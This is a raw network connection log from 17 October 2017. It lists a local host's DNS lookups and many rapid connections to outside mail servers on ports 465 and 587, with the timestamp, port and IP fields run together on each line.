Okt 17, 2017 21:54:39.935833931 MESZ49242465192.168.1.1694.23.80.86
Okt 17, 2017 21:54:39.935863972 MESZ4654924294.23.80.86192.168.1.16
Okt 17, 2017 21:54:39.936696053 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:39.936731100 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.937263012 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:39.937287092 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.982009888 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:39.982682943 MESZ49236465192.168.1.16193.17.223.40
Okt 17, 2017 21:54:39.982708931 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:39.982841015 MESZ49236465192.168.1.16193.17.223.40
Okt 17, 2017 21:54:39.982856035 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:40.052686930 MESZ53551258.8.8.8192.168.1.16
Okt 17, 2017 21:54:40.054672003 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:40.054722071 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:40.054816961 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:40.055305958 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:40.055336952 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:40.062669992 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:40.062701941 MESZ5874924137.9.169.18192.168.1.16
Okt 17, 2017 21:54:40.063083887 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:40.063124895 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:40.063359022 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:40.063426971 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:40.063553095 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:40.065670967 MESZ49241587192.168.1.1637.9.169.18
Okt 17, 2017 21:54:40.065702915 MESZ5874924137.9.169.18192.168.1.16
Okt 17, 2017 21:54:40.065870047 MESZ49241587192.168.1.1637.9.169.18
Okt 17, 2017 21:54:40.065891027 MESZ5874924137.9.169.18192.168.1.16
Okt 17, 2017 21:54:40.071121931 MESZ5215853192.168.1.168.8.8.8
Okt 17, 2017 21:54:40.087569952 MESZ58749214213.186.33.20192.168.1.16
Okt 17, 2017 21:54:40.087613106 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:40.088166952 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:40.089057922 MESZ49214587192.168.1.16213.186.33.20
Okt 17, 2017 21:54:40.089093924 MESZ58749214213.186.33.20192.168.1.16
Okt 17, 2017 21:54:40.089257002 MESZ49214587192.168.1.16213.186.33.20
Okt 17, 2017 21:54:40.089277983 MESZ58749214213.186.33.20192.168.1.16
Okt 17, 2017 21:54:40.089673996 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:40.089699030 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:40.089915037 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:40.089937925 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:40.090136051 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:40.090158939 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:40.090334892 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:40.090356112 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:40.094818115 MESZ4654924294.23.80.86192.168.1.16
Okt 17, 2017 21:54:40.104377985 MESZ4654924294.23.80.86192.168.1.16
Okt 17, 2017 21:54:40.104399920 MESZ4654924294.23.80.86192.168.1.16
Okt 17, 2017 21:54:40.104628086 MESZ49242465192.168.1.1694.23.80.86
Okt 17, 2017 21:54:40.104664087 MESZ4654924294.23.80.86192.168.1.16
Okt 17, 2017 21:54:40.113723040 MESZ49242465192.168.1.1694.23.80.86
Okt 17, 2017 21:54:40.113761902 MESZ4654924294.23.80.86192.168.1.16
Okt 17, 2017 21:54:40.145055056 MESZ53567098.8.8.8192.168.1.16
Okt 17, 2017 21:54:40.146084070 MESZ49244465192.168.1.16217.74.64.236
Okt 17, 2017 21:54:40.146116972 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:40.146480083 MESZ49244465192.168.1.16217.74.64.236
Okt 17, 2017 21:54:40.146756887 MESZ49244465192.168.1.16217.74.64.236
Okt 17, 2017 21:54:40.146776915 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:40.278568983 MESZ5874924137.9.169.18192.168.1.16
Okt 17, 2017 21:54:40.279470921 MESZ49241587192.168.1.1637.9.169.18
Okt 17, 2017 21:54:40.279508114 MESZ5874924137.9.169.18192.168.1.16
Okt 17, 2017 21:54:40.279666901 MESZ49241587192.168.1.1637.9.169.18
Okt 17, 2017 21:54:40.279690027 MESZ5874924137.9.169.18192.168.1.16
Okt 17, 2017 21:54:40.286837101 MESZ58749214213.186.33.20192.168.1.16
Okt 17, 2017 21:54:40.287818909 MESZ49214587192.168.1.16213.186.33.20
Okt 17, 2017 21:54:40.287854910 MESZ58749214213.186.33.20192.168.1.16
Okt 17, 2017 21:54:40.288012981 MESZ49214587192.168.1.16213.186.33.20
Okt 17, 2017 21:54:40.288036108 MESZ58749214213.186.33.20192.168.1.16
Okt 17, 2017 21:54:40.302592993 MESZ4654924294.23.80.86192.168.1.16
Okt 17, 2017 21:54:40.315232992 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:40.315723896 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:40.315764904 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:40.316044092 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:40.316112995 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:40.316246986 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:40.322349072 MESZ5555753192.168.1.168.8.8.8
Okt 17, 2017 21:54:40.430604935 MESZ53521588.8.8.8192.168.1.16
Okt 17, 2017 21:54:40.430689096 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:40.431798935 MESZ49245465192.168.1.1691.136.8.189
Okt 17, 2017 21:54:40.431833029 MESZ4654924591.136.8.189192.168.1.16
Okt 17, 2017 21:54:40.431961060 MESZ49245465192.168.1.1691.136.8.189
Okt 17, 2017 21:54:40.432281017 MESZ49245465192.168.1.1691.136.8.189
Okt 17, 2017 21:54:40.432300091 MESZ4654924591.136.8.189192.168.1.16
Okt 17, 2017 21:54:40.432552099 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:40.432570934 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:40.432694912 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:40.432708979 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:40.437640905 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:40.438138962 MESZ49236465192.168.1.16193.17.223.40
Okt 17, 2017 21:54:40.438162088 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:40.438388109 MESZ49236465192.168.1.16193.17.223.40
Okt 17, 2017 21:54:40.438404083 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:40.467976093 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:40.467998981 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:40.468007088 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:40.468147993 MESZ49244465192.168.1.16217.74.64.236
Okt 17, 2017 21:54:40.472919941 MESZ49244465192.168.1.16217.74.64.236
Okt 17, 2017 21:54:40.472939014 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:40.495618105 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:40.495809078 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:40.495829105 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:40.495918989 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:40.495973110 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:40.496035099 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:40.504478931 MESZ4654924294.23.80.86192.168.1.16
Okt 17, 2017 21:54:40.504595041 MESZ49242465192.168.1.1694.23.80.86
Okt 17, 2017 21:54:40.504760027 MESZ49242465192.168.1.1694.23.80.86
Okt 17, 2017 21:54:40.504776001 MESZ4654924294.23.80.86192.168.1.16
Okt 17, 2017 21:54:40.506252050 MESZ49242465192.168.1.1694.23.80.86
Okt 17, 2017 21:54:40.506270885 MESZ4654924294.23.80.86192.168.1.16
Okt 17, 2017 21:54:40.506454945 MESZ58749214213.186.33.20192.168.1.16
Okt 17, 2017 21:54:40.510023117 MESZ49214587192.168.1.16213.186.33.20
Okt 17, 2017 21:54:40.510129929 MESZ58749214213.186.33.20192.168.1.16
Okt 17, 2017 21:54:40.512501001 MESZ49214587192.168.1.16213.186.33.20
Okt 17, 2017 21:54:40.512640953 MESZ5431453192.168.1.168.8.8.8
Okt 17, 2017 21:54:40.515192986 MESZ5917753192.168.1.168.8.8.8
Okt 17, 2017 21:54:40.546652079 MESZ5874924137.9.169.18192.168.1.16
Okt 17, 2017 21:54:40.548290968 MESZ49241587192.168.1.1637.9.169.18
Okt 17, 2017 21:54:40.548398018 MESZ5874924137.9.169.18192.168.1.16
Okt 17, 2017 21:54:40.552510023 MESZ49241587192.168.1.1637.9.169.18
Okt 17, 2017 21:54:40.555732965 MESZ53555578.8.8.8192.168.1.16
Okt 17, 2017 21:54:40.556476116 MESZ49246465192.168.1.1691.136.8.189
Okt 17, 2017 21:54:40.556504011 MESZ4654924691.136.8.189192.168.1.16
Okt 17, 2017 21:54:40.556559086 MESZ49246465192.168.1.1691.136.8.189
Okt 17, 2017 21:54:40.556823015 MESZ49246465192.168.1.1691.136.8.189
Okt 17, 2017 21:54:40.556840897 MESZ4654924691.136.8.189192.168.1.16
Okt 17, 2017 21:54:40.559281111 MESZ5337953192.168.1.168.8.8.8
Okt 17, 2017 21:54:40.643233061 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:40.687746048 MESZ4654924294.23.80.86192.168.1.16
Okt 17, 2017 21:54:40.687932014 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:40.688281059 MESZ49242465192.168.1.1694.23.80.86
Okt 17, 2017 21:54:40.688308954 MESZ4654924294.23.80.86192.168.1.16
Okt 17, 2017 21:54:40.688740969 MESZ49242465192.168.1.1694.23.80.86
Okt 17, 2017 21:54:40.688851118 MESZ4654924294.23.80.86192.168.1.16
Okt 17, 2017 21:54:40.688963890 MESZ49242465192.168.1.1694.23.80.86
Okt 17, 2017 21:54:40.689517021 MESZ49236465192.168.1.16193.17.223.40
Okt 17, 2017 21:54:40.689541101 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:40.689738989 MESZ49236465192.168.1.16193.17.223.40
Okt 17, 2017 21:54:40.689802885 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:40.689894915 MESZ49236465192.168.1.16193.17.223.40
Okt 17, 2017 21:54:40.693851948 MESZ4942053192.168.1.168.8.8.8
Okt 17, 2017 21:54:40.697457075 MESZ5406153192.168.1.168.8.8.8
Okt 17, 2017 21:54:40.735666990 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:40.735985994 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:40.736015081 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:40.736164093 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:40.736185074 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:40.736557961 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:40.736578941 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:40.737330914 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:40.737361908 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:40.844484091 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:40.844682932 MESZ49244465192.168.1.16217.74.64.236
Okt 17, 2017 21:54:40.844949961 MESZ49244465192.168.1.16217.74.64.236
Okt 17, 2017 21:54:40.844976902 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:40.845184088 MESZ49244465192.168.1.16217.74.64.236
Okt 17, 2017 21:54:40.845208883 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:40.849541903 MESZ53543148.8.8.8192.168.1.16
Okt 17, 2017 21:54:40.851368904 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:40.851421118 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:40.851536036 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:40.852040052 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:40.852071047 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:40.999649048 MESZ53533798.8.8.8192.168.1.16
Okt 17, 2017 21:54:41.001041889 MESZ49248587192.168.1.16213.145.228.17
Okt 17, 2017 21:54:41.001091957 MESZ58749248213.145.228.17192.168.1.16
Okt 17, 2017 21:54:41.001211882 MESZ49248587192.168.1.16213.145.228.17
Okt 17, 2017 21:54:41.091957092 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:41.092380047 MESZ49244465192.168.1.16217.74.64.236
Okt 17, 2017 21:54:41.092406034 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:41.092575073 MESZ49244465192.168.1.16217.74.64.236
Okt 17, 2017 21:54:41.092591047 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:41.099785089 MESZ53591778.8.8.8192.168.1.16
Okt 17, 2017 21:54:41.100091934 MESZ49212465192.168.1.1640.101.43.178
Okt 17, 2017 21:54:41.100218058 MESZ4654921240.101.43.178192.168.1.16
Okt 17, 2017 21:54:41.102020979 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:41.102082014 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:41.102226973 MESZ49212465192.168.1.1640.101.43.178
Okt 17, 2017 21:54:41.102298975 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:41.102823973 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:41.102854013 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:41.108417988 MESZ5191953192.168.1.168.8.8.8
Okt 17, 2017 21:54:41.113715887 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:41.113739967 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:41.113929033 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:41.128110886 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:41.128139019 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:41.161645889 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:41.162142038 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:41.162170887 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:41.162302971 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:41.162322044 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:41.189830065 MESZ53540618.8.8.8192.168.1.16
Okt 17, 2017 21:54:41.190893888 MESZ49250465192.168.1.1678.108.80.162
Okt 17, 2017 21:54:41.190934896 MESZ4654925078.108.80.162192.168.1.16
Okt 17, 2017 21:54:41.191447020 MESZ49250465192.168.1.1678.108.80.162
Okt 17, 2017 21:54:41.191786051 MESZ49250465192.168.1.1678.108.80.162
Okt 17, 2017 21:54:41.191809893 MESZ4654925078.108.80.162192.168.1.16
Okt 17, 2017 21:54:41.199172020 MESZ53494208.8.8.8192.168.1.16
Okt 17, 2017 21:54:41.200773954 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:41.200824976 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:41.200930119 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:41.201437950 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:41.201472044 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:41.269423008 MESZ58749248213.145.228.17192.168.1.16
Okt 17, 2017 21:54:41.270320892 MESZ49248587192.168.1.16213.145.228.17
Okt 17, 2017 21:54:41.270347118 MESZ58749248213.145.228.17192.168.1.16
Okt 17, 2017 21:54:41.271676064 MESZ49248587192.168.1.16213.145.228.17
Okt 17, 2017 21:54:41.271692991 MESZ58749248213.145.228.17192.168.1.16
Okt 17, 2017 21:54:41.338852882 MESZ53519198.8.8.8192.168.1.16
Okt 17, 2017 21:54:41.339873075 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:41.339903116 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:41.340418100 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:41.352895021 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:41.353161097 MESZ49244465192.168.1.16217.74.64.236
Okt 17, 2017 21:54:41.353184938 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:41.353315115 MESZ49244465192.168.1.16217.74.64.236
Okt 17, 2017 21:54:41.353374958 MESZ46549244217.74.64.236192.168.1.16
Okt 17, 2017 21:54:41.353985071 MESZ49244465192.168.1.16217.74.64.236
Okt 17, 2017 21:54:41.357425928 MESZ5456353192.168.1.168.8.8.8
Okt 17, 2017 21:54:41.360512018 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:41.361624956 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:41.361653090 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:41.361792088 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:41.361812115 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:41.368396044 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:41.368417025 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:41.368424892 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:41.368798971 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:41.387363911 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:41.452966928 MESZ4654925078.108.80.162192.168.1.16
Okt 17, 2017 21:54:41.453531981 MESZ49250465192.168.1.1678.108.80.162
Okt 17, 2017 21:54:41.457832098 MESZ6301053192.168.1.168.8.8.8
Okt 17, 2017 21:54:41.551223993 MESZ58749248213.145.228.17192.168.1.16
Okt 17, 2017 21:54:41.552750111 MESZ49248587192.168.1.16213.145.228.17
Okt 17, 2017 21:54:41.552788973 MESZ58749248213.145.228.17192.168.1.16
Okt 17, 2017 21:54:41.553061008 MESZ49248587192.168.1.16213.145.228.17
Okt 17, 2017 21:54:41.553087950 MESZ58749248213.145.228.17192.168.1.16
Okt 17, 2017 21:54:41.560185909 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:41.562786102 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:41.562824965 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:41.562988043 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:41.563011885 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:41.578969955 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:41.578991890 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:41.579370975 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:41.586069107 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:41.588483095 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:41.588916063 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:41.595680952 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:41.595706940 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:41.672375917 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:41.672399998 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:41.672638893 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:41.710196018 MESZ53545638.8.8.8192.168.1.16
Okt 17, 2017 21:54:41.710288048 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:41.711834908 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:41.711888075 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:41.712019920 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:41.712591887 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:41.712624073 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:41.712945938 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:41.712975979 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:41.713169098 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:41.713193893 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:41.715667009 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:41.716101885 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:41.716145992 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:41.716768980 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:41.716806889 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:41.763710976 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:41.787204981 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:41.787229061 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:41.788135052 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:41.788156033 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:41.792656898 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:41.792680025 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:41.818633080 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:41.872137070 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:41.879357100 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:41.879589081 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:41.879632950 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:41.879897118 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:41.879921913 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:41.880059958 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:41.880079985 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:41.880212069 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:41.880232096 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:41.889811039 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:41.889834881 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:41.890043020 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:41.908324957 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:41.917805910 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:41.917850971 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:41.960427046 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:42.004092932 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:42.004540920 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:42.004580975 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:42.004754066 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:42.004779100 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:42.011389971 MESZ53630108.8.8.8192.168.1.16
Okt 17, 2017 21:54:42.012856960 MESZ49254465192.168.1.1694.152.8.23
Okt 17, 2017 21:54:42.012914896 MESZ4654925494.152.8.23192.168.1.16
Okt 17, 2017 21:54:42.013025045 MESZ49254465192.168.1.1694.152.8.23
Okt 17, 2017 21:54:42.013544083 MESZ49254465192.168.1.1694.152.8.23
Okt 17, 2017 21:54:42.013576984 MESZ4654925494.152.8.23192.168.1.16
Okt 17, 2017 21:54:42.021800041 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:42.021826982 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:42.023773909 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:42.023798943 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:42.027352095 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:42.027374029 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:42.033122063 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:42.153213978 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:42.164484024 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:42.164731026 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:42.164928913 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:42.164948940 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:42.165487051 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:42.165513992 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:42.172352076 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:42.173573017 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:42.173604012 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:42.206657887 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:42.207195997 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:42.207223892 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:42.207407951 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:42.207432032 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:42.260482073 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:42.261327982 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:42.261502028 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:42.261524916 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:42.261775017 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:42.261797905 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:42.273298025 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:42.273574114 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:42.273598909 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:42.274143934 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:42.274163961 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:42.330739975 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:42.331244946 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:42.331288099 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:42.331486940 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:42.331513882 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:42.332590103 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:42.332622051 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:42.333041906 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:42.333070993 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:42.351171970 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:42.351201057 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:42.351222992 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:42.351376057 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:42.356462955 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:42.356642962 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:42.356874943 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:42.356904984 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:42.357083082 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:42.357109070 MESZ46549253153.92.65.114192.168.1.16
